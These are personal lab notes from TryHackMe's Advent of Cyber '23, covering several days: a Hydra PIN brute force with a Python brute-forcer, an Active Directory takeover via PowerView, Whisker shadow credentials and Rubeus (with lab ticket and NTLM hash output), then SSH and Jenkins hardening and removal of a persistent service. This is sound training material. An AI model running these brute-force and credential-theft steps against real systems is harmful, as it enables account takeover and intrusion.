
TryHackMe - Advent of Cyber '23

Discover the world of cyber security by engaging in a beginner-friendly exercise every day in the lead-up to Christmas!

This is just a collection of notes I took while doing the Advent of Cyber room. I focused on the side quest version because it was more challenging, as it included challenges of hard to insane difficulty. The main tasks of “Advent of Cyber” were mostly guided, straightforward exercises, but the side quests were tougher and more interesting.

Day 3 - Hydra is Coming to Town

$ crunch 3 3 0123456789BCDEF -o combinations.txt

$ hydra -l "" -P combinations.txt -f 10.10.107.133 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-05 16:54:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3375 login tries (l:1/p:3375), ~211 tries per task
[DATA] attacking http-post-form://10.10.107.133:8000/login.php:pin=^PASS^:Access denied
[8000][http-post-form] host: 10.10.107.133   password: 6F5
[STATUS] attack finished for 10.10.107.133 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-05 16:55:27
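Two things worth noticing in the run above: the crunch charset skips the letter A, so the keyspace is 15^3 = 3375 rather than the full 16^3 = 4096 three-digit hex PINs (the PIN still turned up because 6F5 contains no A), and the http-post-form condition `:Access denied` is a failure string, so any response that happens not to contain it (an error page, a rate-limit message) is reported as a hit. The Python below is an added example, not part of the room or of these notes: it reproduces what hydra's http-post-form module does against a constructed local stand-in for `/login.php` (the stand-in's PIN 6F5, the `Welcome back` body and port are assumptions), walks the full hex keyspace in crunch order, stops at the first hit like `-f`, and treats HTTP error responses as misses so an error page cannot pass as a success.

```python
import itertools
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed for the offline run: the stand-in's PIN and the strings hydra keyed on.
SECRET_PIN = "6F5"
FAIL_MARKER = b"Access denied"
HEX_CHARSET = "0123456789ABCDEF"   # full alphabet; the crunch line above skips 'A' (15^3 = 3375)


class LoginHandler(BaseHTTPRequestHandler):
    """Stand-in for /login.php: reads the POSTed pin, answers 'Access denied' unless it matches."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        ok = form.get("pin", [""])[0] == SECRET_PIN
        body = b"Welcome back" if ok else FAIL_MARKER
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the run quiet


def start_server():
    """Bind the stand-in on an ephemeral loopback port and serve it from a background thread."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def candidate_pins(charset=HEX_CHARSET, length=3):
    """The keyspace crunch produces: every string of `length` symbols over `charset`, in order."""
    for combo in itertools.product(charset, repeat=length):
        yield "".join(combo)


def attempt(url, pin):
    """One http-post-form try: POST pin=^PASS^, call it a hit only if the failure string is absent."""
    data = urllib.parse.urlencode({"pin": pin}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return FAIL_MARKER not in resp.read()
    except urllib.error.HTTPError:
        return False  # an error page also lacks the failure string; do not count it as a hit


def brute_force(url, pins):
    """Walk the keyspace and stop at the first hit, like hydra -f. Returns (pin, tries)."""
    tries = 0
    for pin in pins:
        tries += 1
        if attempt(url, pin):
            return pin, tries
    return None, tries


if __name__ == "__main__":
    srv = start_server()
    target = f"http://127.0.0.1:{srv.server_port}/login.php"
    print(brute_force(target, candidate_pins()))
    srv.shutdown()
```

Against a real target prefer hydra's success-string form (`S=<string only a valid login shows>`) over a failure string where the application allows it; the stand-in above shows why, since only the `Welcome back` body distinguishes a real hit from any other non-"Access denied" answer.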

Day 6 - Memories of Christmas Past

Reverse the hex byte by byte, since “an integer’s bytes are stored in reverse order in most desktop machines. This is known as the little-endian byte order.”

>>> int('53504f4f', 16)
1397772111
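The Python below is an added example, not from the room or these notes. It shows both directions of the conversion and the pitfall in "reverse the hex": the reversal has to happen two hex digits at a time, because reversing the string character by character scrambles the nibbles inside each byte. The memory dump `4f4f5053` used here is constructed by reversing the page's `53504f4f` byte-wise; what the room's memory actually held is not shown on the page.

```python
import struct


def bytes_to_int(memory_hex, byteorder="little"):
    """Interpret a hex dump of an integer's bytes, in memory order, as the integer's value."""
    return int.from_bytes(bytes.fromhex(memory_hex), byteorder)


def reverse_byte_order(hex_string):
    """Reverse a hex dump one byte (two digits) at a time; hex_string[::-1] would be wrong."""
    return bytes.fromhex(hex_string)[::-1].hex()


def little_endian_view(value, size=4):
    """What a little-endian machine stores for value (low byte first): (hex dump, ASCII view)."""
    mem = struct.pack("<I", value) if size == 4 else value.to_bytes(size, "little")
    return mem.hex(), mem.decode("ascii", errors="replace")


if __name__ == "__main__":
    dump = "4f4f5053"                      # constructed little-endian dump of the value above
    print(bytes_to_int(dump))              # same number as int('53504f4f', 16)
    print(reverse_byte_order(dump))        # '53504f4f', the form used in the notes
    print(little_endian_view(1397772111))  # the bytes and what they spell
```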

Day 11 - Active Directory

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\hr> cd Desktop
PS C:\Users\hr\Desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\hr\Desktop> . .\PowerView.ps1
PS C:\Users\hr\Desktop> Find-InterestingDomainAcl -ResolveGuids


ObjectDN                : CN=SOUTHPOLE,OU=Domain Controllers,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1966530601-3185510712-10604624-1111
IdentityReferenceName   : tracymcgreedy
IdentityReferenceDomain : AOC.local
IdentityReferenceDN     : CN=tracymcgreedy,CN=Users,DC=AOC,DC=local
IdentityReferenceClass  : user

...
...
...

ObjectDN                : CN=vansprinkles,CN=Users,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1966530601-3185510712-10604624-1115
IdentityReferenceName   : hr
IdentityReferenceDomain : AOC.local
IdentityReferenceDN     : CN=hr,CN=Users,DC=AOC,DC=local
IdentityReferenceClass  : user

PS C:\Users\hr\Desktop> Find-InterestingDomainAcl -ResolveGuids | Where-Object {$_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

IdentityReferenceName ObjectDN                                                    ActiveDirectoryRights
--------------------- --------                                                    ---------------------
hr                    CN=vansprinkles,CN=Users,DC=AOC,DC=local ListChildren, ReadProperty, GenericWrite


PS C:\Users\hr\Desktop> .\Whisker.exe add /target:vansprinkles
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password CoBKPuBUD9D2LjMP
[*] Searching for the target account
[*] Target user found: CN=vansprinkles,CN=Users,DC=AOC,DC=local
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 14676531-c805-45f4-9520-6b7597c8bdf9
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJ__BASE64_BLOB_IH0A== /password:"CoBKPuBUD9D2LjMP" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show
PS C:\Users\hr\Desktop> ./Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJ__BASE64_BLOB__IH0A== /password:"CoBKPuBUD9D2LjMP" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=vansprinkles
[*] Building AS-REQ (w/ PKINIT preauth) for: 'AOC.local\vansprinkles'
[*] Using domain controller: fe80::8829:a8ac:2d8c:883d%5:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
      T0MubG9jYWw=

  ServiceName              :  krbtgt/AOC.local
  ServiceRealm             :  AOC.LOCAL
  UserName                 :  vansprinkles
  UserRealm                :  AOC.LOCAL
  StartTime                :  12/12/2023 2:34:09 PM
  EndTime                  :  12/13/2023 12:34:09 AM
  RenewTill                :  12/19/2023 2:34:09 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  f4cjFwhWPplYurcQl7ecMA==
  ASREP (key)              :  80902887AE4CB7480CCAC23AAB7F90D0

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 03E805D8A8C5AA435FB48832DAD620E3
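The chain above is: hr holds GenericWrite over vansprinkles, so Whisker can write a new key credential into that user's msDS-KeyCredentialLink attribute (shadow credentials); Rubeus then uses the matching certificate for PKINIT to obtain a TGT and, with /getcredentials, performs a U2U request that yields the account's NTLM hash. The Python below is an added example, not from the room, from PowerView or from these notes: it parses PowerView's `Key : Value` record output and picks out every allow-ACE in which a principal that is not an expected admin group holds a right that enables a takeover of the target object, which is the triage step between "Find-InterestingDomainAcl printed pages of output" and "pick the next account to go after". The sample text embeds the two records from the run above plus one constructed Domain Admins record to show the filtering; the set of rights and the principal allow-list are assumptions, extend them to taste.

```python
import re

# Rights over another object that let the holder take it over, with the abuse each one enables.
# The first two are the ones that appear in the PowerView output above.
TAKEOVER_RIGHTS = {
    "GenericAll": "full control: reset password, add key credential, edit anything",
    "GenericWrite": "write any attribute, incl. msDS-KeyCredentialLink (shadow credentials)",
    "WriteDacl": "grant yourself any further right on the object",
    "WriteOwner": "take ownership, then rewrite the DACL",
    "WriteProperty": "write the attribute named in ObjectAceType; check which one",
}
# Principals expected to hold such rights; everything else is a lead worth chasing.
EXPECTED_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}

RECORD_LINE = re.compile(r"^\s*(\w+)\s*:\s*(.*)$")


def parse_records(text):
    """Split PowerView's 'Key : Value' list output into dicts, one per blank-line-separated record."""
    records, current = [], {}
    for line in text.splitlines():
        m = RECORD_LINE.match(line)
        if m:
            current[m.group(1)] = m.group(2).strip()
        elif current:
            records.append(current)
            current = {}
    if current:
        records.append(current)
    return records


def triage(text):
    """Return (principal, target DN, right, abuse) for each allow-ACE held by a non-admin principal."""
    hits = []
    for rec in parse_records(text):
        if rec.get("AceQualifier") != "AccessAllowed":
            continue
        if rec.get("IdentityReferenceName") in EXPECTED_PRINCIPALS:
            continue
        rights = {r.strip() for r in rec.get("ActiveDirectoryRights", "").split(",")}
        for right in sorted(rights & TAKEOVER_RIGHTS.keys()):
            hits.append((rec["IdentityReferenceName"], rec["ObjectDN"], right, TAKEOVER_RIGHTS[right]))
    return hits


# The two records from the Find-InterestingDomainAcl run above (trimmed to the fields used here),
# plus one constructed Domain Admins record to show that expected holders are filtered out.
SAMPLE_OUTPUT = """
ObjectDN                : CN=SOUTHPOLE,OU=Domain Controllers,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
IdentityReferenceName   : tracymcgreedy
IdentityReferenceDomain : AOC.local
IdentityReferenceClass  : user

ObjectDN                : CN=vansprinkles,CN=Users,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
IdentityReferenceName   : hr
IdentityReferenceDomain : AOC.local
IdentityReferenceClass  : user

ObjectDN                : CN=vansprinkles,CN=Users,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
IdentityReferenceName   : Domain Admins
IdentityReferenceClass  : group
"""

if __name__ == "__main__":
    for principal, dn, right, abuse in triage(SAMPLE_OUTPUT):
        print(f"{principal} -> {dn}: {right} ({abuse})")
```

On the defensive side the Whisker step leaves a concrete trace: a write to msDS-KeyCredentialLink on a user object, which with object-change auditing enabled on the DC shows up as a Directory Service Changes event (ID 5136) naming the attribute, the target and the account that wrote it (here hr).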

Day 12 - Defence in Depth

The goal is to set up defenses in multiple layers of the application and server.

Disable SSH password authentication

$ ssh admin@10.10.37.50
admin@jenkins:~$ sudo vi /etc/ssh/sshd_config
admin@jenkins:~$ awk 'NR==57 || NR==12' /etc/ssh/sshd_config
#Include /etc/ssh/sshd_config.d/*.conf
PasswordAuthentication no
root@jenkins:/etc/ssh/sshd_config.d# awk 'NR==58' /etc/ssh/sshd_config
#Ne3d2SecureTh1sSecureSh31l
admin@jenkins:~$ sudo systemctl restart ssh
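Note the two lines the awk command prints: line 57 sets `PasswordAuthentication no`, and line 12 is the `Include /etc/ssh/sshd_config.d/*.conf` directive, commented out. The reason that matters is how sshd reads its configuration: the first value obtained for a keyword wins, and an Include is expanded at the point where it appears. With the Include active near the top of the file, a drop-in such as the `50-cloud-init.conf` that many Ubuntu cloud images ship with `PasswordAuthentication yes` would be read first and silently override the `no` on line 57. The Python below is an added example, not part of the room or these notes: it emulates that first-value-wins rule with Include expansion over two constructed configs, one with the Include active and a drop-in re-enabling passwords, one with the Include commented out as in the edit above (file names and the `Match` block are assumptions).

```python
import glob
import os
import tempfile
from pathlib import Path


def effective_sshd_config(path, seen=None):
    """Emulate how sshd reads its config: the FIRST value obtained for a keyword wins, an Include
    is expanded at the point where it appears, and only the global section (before any Match)
    decides the defaults. Returns {keyword_lowercased: value}."""
    seen = {} if seen is None else seen
    for raw in Path(path).read_text().splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":           # conditional block: stop, the global value is settled
            break
        if key == "include":
            pattern = value if os.path.isabs(value) else os.path.join("/etc/ssh", value)
            for included in sorted(glob.glob(pattern)):
                effective_sshd_config(included, seen)
            continue
        seen.setdefault(key, value)  # a later line for the same keyword does NOT override
    return seen


def password_auth_disabled(path):
    """True only when the effective value is 'no'; sshd's built-in default when unset is 'yes'."""
    return effective_sshd_config(path).get("passwordauthentication", "yes").lower() == "no"


def build_samples():
    """Constructed configs for an offline run. 'before' keeps the Include active while a drop-in
    (named after the one cloud-init writes on Ubuntu images) re-enables passwords; 'after' is the
    edit from the notes, with the Include commented out. Absolute Include paths are used so the
    example never touches /etc/ssh."""
    root = Path(tempfile.mkdtemp())
    dropins = root / "sshd_config.d"
    dropins.mkdir()
    (dropins / "50-cloud-init.conf").write_text("PasswordAuthentication yes\n")
    body = ("PermitRootLogin no\n"
            "PasswordAuthentication no\n"
            "Match User backup\n"
            "    PasswordAuthentication yes\n")
    before = root / "sshd_config.before"
    after = root / "sshd_config.after"
    before.write_text(f"Include {dropins}/*.conf\n{body}")
    after.write_text(f"#Include {dropins}/*.conf\n{body}")
    return str(before), str(after)


if __name__ == "__main__":
    before, after = build_samples()
    print("Include active, drop-in says yes :", password_auth_disabled(before))
    print("Include commented out            :", password_auth_disabled(after))
```

On the box itself the authoritative check is `sudo sshd -T | grep -i passwordauthentication`, which prints the value sshd will actually use after all includes; run it before restarting the service.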

Disable Jenkins anonymous access

admin@jenkins:~$ sudo su
root@jenkins:/home/admin# cd /root
root@jenkins:~# ls
flag.txt  snap
root@jenkins:~# cat flag.txt
ezRo0tW1thoutDiD
root@jenkins:~# cd /var/lib/jenkins
root@jenkins:/var/lib/jenkins# vi config.xml.bak
root@jenkins:/var/lib/jenkins# mv config.xml.bak config.xml
root@jenkins:/var/lib/jenkins# sed -n '10,18p' config.xml 
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <FullTrust_has_n0_Place1nS3cur1ty>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm-->
  <disableRememberMe>false</disableRememberMe>
root@jenkins:/var/lib/jenkins# sudo systemctl restart jenkins

Day 18 - Eradication: A Gift That Keeps on Giving

ubuntu@tryhackme:~$ top

top - 18:40:48 up 1 min,  0 users,  load average: 1.87, 0.90, 0.34
Tasks: 195 total,   2 running, 191 sleeping,   0 stopped,   2 zombie
%Cpu(s): 50.5 us,  0.2 sy,  0.0 ni, 49.3 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
MiB Mem :   3933.8 total,   2512.2 free,    620.2 used,    801.3 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3049.9 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND  
    683 root      20   0    2488   1588   1492 R 100.0   0.0   1:22.39 a        
   1795 root      20   0  122148  26068   7636 S   0.7   0.6   0:00.15 python3  
    938 ubuntu    20   0  345036 121952  56956 S   0.3   3.0   0:02.92 Xtigerv+ 
   1807 ubuntu    20   0  471000  47564  37836 S   0.3   1.2   0:00.19 mate-te+ 
   1822 ubuntu    20   0    6276   3348   2852 R   0.3   0.1   0:00.02 top      
      1 root      20   0  102548  11688   8252 S   0.0   0.3   0:04.07 systemd  
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.00 kthreadd 
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp   
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par+ 
      5 root      20   0       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      6 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      7 root      20   0       0      0      0 I   0.0   0.0   0:00.08 kworker+ 
      8 root      20   0       0      0      0 I   0.0   0.0   0:00.01 kworker+ 
      9 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 mm_perc+ 
     10 root      20   0       0      0      0 S   0.0   0.0   0:00.07 ksoftir+ 
     11 root      20   0       0      0      0 I   0.0   0.0   0:00.21 rcu_sch+ 
     12 root      rt   0       0      0      0 S   0.0   0.0   0:00.00 migrati+ 
ubuntu@tryhackme:~$ sudo kill 683
ubuntu@tryhackme:~$ top

top - 18:41:11 up 2 min,  0 users,  load average: 1.79, 0.96, 0.38
Tasks: 195 total,   3 running, 190 sleeping,   0 stopped,   2 zombie
%Cpu(s): 53.3 us,  0.0 sy,  0.0 ni, 43.3 id,  0.0 wa,  0.0 hi,  0.0 si,  3.3 st
MiB Mem :   3933.8 total,   2512.3 free,    620.0 used,    801.4 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3050.1 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND  
   1848 root      20   0    2488   1472   1384 R 100.0   0.0   0:05.17 a        
    938 ubuntu    20   0  345036 121952  56956 R   6.2   3.0   0:03.05 Xtigerv+ 
   1853 ubuntu    20   0    6276   3364   2868 R   6.2   0.1   0:00.01 top      
      1 root      20   0  102548  11688   8252 S   0.0   0.3   0:04.07 systemd  
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.00 kthreadd 
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp   
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par+ 
      5 root      20   0       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      6 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      7 root      20   0       0      0      0 I   0.0   0.0   0:00.08 kworker+ 
      8 root      20   0       0      0      0 I   0.0   0.0   0:00.01 kworker+ 
      9 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 mm_perc+ 
     10 root      20   0       0      0      0 S   0.0   0.0   0:00.07 ksoftir+ 
     11 root      20   0       0      0      0 I   0.0   0.0   0:00.21 rcu_sch+ 
     12 root      rt   0       0      0      0 S   0.0   0.0   0:00.00 migrati+ 
     13 root      20   0       0      0      0 S   0.0   0.0   0:00.00 cpuhp/0  
     14 root      20   0       0      0      0 S   0.0   0.0   0:00.00 cpuhp/1  
ubuntu@tryhackme:~$ crontab -l
@reboot sudo runuser -l ubuntu -c 'vncserver :1 -depth 24 -geometry 1900x1200'
@reboot sudo python3 -m websockify 80 localhost:5901 -D
ubuntu@tryhackme:~$ sudo su
root@tryhackme:/home/ubuntu# crontab -l
root@tryhackme:/home/ubuntu# systemctl list-unit-files
UNIT FILE                                      STATE           VENDOR PRESET
proc-sys-fs-binfmt_misc.automount              static          enabled      
-.mount                                        generated       enabled      
dev-hugepages.mount                            static          enabled      
dev-mqueue.mount                               static          enabled      
proc-sys-fs-binfmt_misc.mount                  disabled        enabled
...
...
...  
a-unkillable.service                           enabled         enabled      
accounts-daemon.service                        enabled         enabled      
acpid.service                                  disabled        enabled      
alsa-restore.service                           static          enabled      
alsa-state.service                             static          enabled      
alsa-utils.service                             masked          enabled      
...
...
...
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
● a-unkillable.service - Unkillable exe
     Loaded: loaded (/etc/systemd/system/a-unkillable.service; enabled; vendor >
     Active: active (running) since Mon 2023-12-18 18:39:18 UTC; 4min 33s ago
   Main PID: 589 (sudo)
      Tasks: 5 (limit: 4710)
     Memory: 3.5M
     CGroup: /system.slice/a-unkillable.service
             ├─ 589 /usr/bin/sudo /etc/systemd/system/a service
             ├─ 666 /etc/systemd/system/a service
             └─1848 unkillable proc

Dec 18 18:39:18 tryhackme systemd[1]: Started Unkillable exe.
Dec 18 18:39:18 tryhackme sudo[589]:     root : TTY=unknown ; PWD=/ ; USER=root>
Dec 18 18:39:18 tryhackme sudo[589]: pam_unix(sudo:session): session opened for>
Dec 18 18:39:18 tryhackme sudo[692]: Merry Christmas
Dec 18 18:41:06 tryhackme sudo[1852]: Merry Christmas

root@tryhackme:/home/ubuntu# systemctl stop a-unkillable.service
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
● a-unkillable.service - Unkillable exe
     Loaded: loaded (/etc/systemd/system/a-unkillable.service; enabled; vendor >
     Active: inactive (dead) since Mon 2023-12-18 18:45:00 UTC; 6s ago
    Process: 589 ExecStart=/usr/bin/sudo /etc/systemd/system/a service (code=ki>
   Main PID: 589 (code=killed, signal=TERM)

Dec 18 18:39:18 tryhackme systemd[1]: Started Unkillable exe.
Dec 18 18:39:18 tryhackme sudo[589]:     root : TTY=unknown ; PWD=/ ; USER=root>
Dec 18 18:39:18 tryhackme sudo[589]: pam_unix(sudo:session): session opened for>
Dec 18 18:39:18 tryhackme sudo[692]: Merry Christmas
Dec 18 18:41:06 tryhackme sudo[1852]: Merry Christmas
Dec 18 18:45:00 tryhackme systemd[1]: Stopping Unkillable exe...
Dec 18 18:45:00 tryhackme sudo[589]: pam_unix(sudo:session): session closed for>
Dec 18 18:45:00 tryhackme systemd[1]: a-unkillable.service: Succeeded.
Dec 18 18:45:00 tryhackme systemd[1]: Stopped Unkillable exe.

root@tryhackme:/home/ubuntu# top

top - 18:45:25 up 6 min,  0 users,  load average: 0.73, 0.99, 0.55
Tasks: 187 total,   1 running, 186 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.5 us,  0.2 sy,  0.0 ni, 99.2 id,  0.0 wa,  0.0 hi,  0.0 si,  0.2 st
MiB Mem :   3933.8 total,   2494.9 free,    617.7 used,    821.1 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3052.1 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND  
    938 ubuntu    20   0  345036 121952  56956 S   1.0   3.0   0:08.48 Xtigerv+ 
   1795 root      20   0  123372  27368   7636 S   0.7   0.7   0:01.64 python3  
    590 root      20   0  237420   7492   6520 S   0.3   0.2   0:00.07 account+ 
   1194 lightdm   20   0  639700  45008  37472 S   0.3   1.1   0:00.86 slick-g+ 
   1807 ubuntu    20   0  472516  48728  38812 S   0.3   1.2   0:01.53 mate-te+ 
   1991 root      20   0   10996   3788   3276 R   0.3   0.1   0:00.01 top      
      1 root      20   0  104596  11796   8252 S   0.0   0.3   0:08.63 systemd  
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.00 kthreadd 
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp   
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par+ 
      6 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      8 root      20   0       0      0      0 I   0.0   0.0   0:00.01 kworker+ 
      9 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 mm_perc+ 
     10 root      20   0       0      0      0 S   0.0   0.0   0:00.14 ksoftir+ 
     11 root      20   0       0      0      0 I   0.0   0.0   0:00.24 rcu_sch+ 
     12 root      rt   0       0      0      0 S   0.0   0.0   0:00.00 migrati+ 
     13 root      20   0       0      0      0 S   0.0   0.0   0:00.00 cpuhp/0  
root@tryhackme:/home/ubuntu# systemctl disable a-unkillable.service
Removed /etc/systemd/system/multi-user.target.wants/a-unkillable.service.
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
● a-unkillable.service - Unkillable exe
     Loaded: loaded (/etc/systemd/system/a-unkillable.service; disabled; vendor>
     Active: inactive (dead)

